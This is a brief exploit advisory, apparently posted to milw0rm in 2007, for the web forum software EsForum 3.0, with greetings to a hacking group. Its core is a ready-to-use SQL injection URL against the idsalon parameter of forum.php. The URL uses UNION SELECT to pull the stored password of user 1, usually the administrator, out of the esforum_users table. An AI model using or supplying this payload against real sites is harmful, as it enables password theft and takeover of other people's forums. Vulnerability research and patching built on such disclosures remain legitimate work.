1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 AYYILDIZ.ORG PreSents...
3
4
5 Script: EsForum 3.0
6 Script Download: http://www.editeurscripts.com/scripts/dl−esforum−3.html
7 Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
8
9 info:
10 */ MEFISTO Begins. */
11
12 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
13 Exploit:
14
15 forum.php?idsalon=’/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/esforum_users%20where%20user_id=1/*
16
17 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
18
19
20 Tnx:H0tturk,Dr.Max Virus,Gencnesil,CodeR,Ajann
21 Special Tnx: AYYILDIZ.ORG
22
23 # milw0rm.com [2007−04−26]
Page 1/1
EsForum 3.0 forum.php idsalon Remote SQL Injection Vulnerability
ilker Kandemir
04/26/2007